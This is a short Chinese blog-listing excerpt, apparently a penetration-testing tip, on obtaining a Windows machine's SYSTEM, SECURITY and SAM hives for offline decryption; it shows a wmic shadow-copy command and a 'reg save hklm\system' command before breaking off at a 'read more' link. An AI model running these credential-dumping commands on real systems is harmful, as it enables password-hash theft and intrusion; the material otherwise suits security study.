摘要: 1、利用卷影拷贝方式获取目标SYSTEM,SECURITY,SAM文件本地离线解密 wmic shadowcopy call create Volume='C:\' 2、powershell 操作注册表导出文件 powershell reg save hklm\system SYSTEM power 阅读全文
posted @ 2021-06-27 14:02 Shadown-PQ 阅读(217) 评论(0) 推荐(0) 编辑